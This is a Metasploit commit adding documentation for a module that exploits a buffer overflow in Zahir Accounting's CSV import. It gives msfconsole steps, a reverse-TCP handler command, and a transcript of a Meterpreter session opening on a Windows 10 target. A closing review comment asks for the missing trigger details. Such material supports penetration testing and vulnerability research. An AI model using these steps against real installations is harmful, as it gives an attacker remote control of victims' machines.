mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Add documentation for Zahir Import File Module

Jacob Robles 2018-10-04 10:12:12 -05:00
parent 060c68d2e0
commit b5c13690c0
No known key found for this signature in database
GPG Key ID: 3EC9F18F2B12401C


@ -0,0 +1,41 @@
## Description
Zahir Accounting Enterprise 6 through build 10.b contains a buffer overflow vulnerability in its Import file functionality, which can be triggered with a crafted CSV file.
## Vulnerable Application
[Zahir Enterprise 6](http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip) through build 10.b
[Update to build 10b](http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip)
## Verification Steps
1. `./msfconsole -q`
2. `use exploit/windows/fileformat/zahir_enterprise_plus_csv`
3. `run`
4. `handler -p <payload> -H <lhost> -P <lport>`
5. From Zahir Application. File -> Import -> Import from File -> Select option -> Specify msf generated file -> Click through to Process
6. Get a session
## Scenarios
### Zahir Enterprise 6 build 10b on Windows 10 x64
```
msf5 exploit(windows/fileformat/zahir_enterprise_plus_csv) >
[*] Started reverse TCP handler on 172.22.222.130:4444
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 4 opened (172.22.222.130:4444 -> 172.22.222.200:49934) at 2018-10-04 10:09:01 -0500
sessions -i 4
[*] Starting interaction with 4...
meterpreter > sysinfo
Computer : DESKTOP-IPOGIJR
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
```
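Review bot: The scenario transcript starts at an empty module prompt and never shows the `use`/`run` output, so a reader cannot see which file was generated or where it was written before step 5 asks them to "Specify msf generated file". Please include the module run in the transcript (with the line reporting the output file) and name the option a tester has to pick at "Select option" in step 5, since that choice is the only unspecified part of the trigger path. Two smaller points: the description says "build 10.b" while the link text and scenario heading say "build 10b", so pick one spelling; and the section headings run directly into the preceding paragraph with no blank line, which some Markdown renderers will not treat as headings.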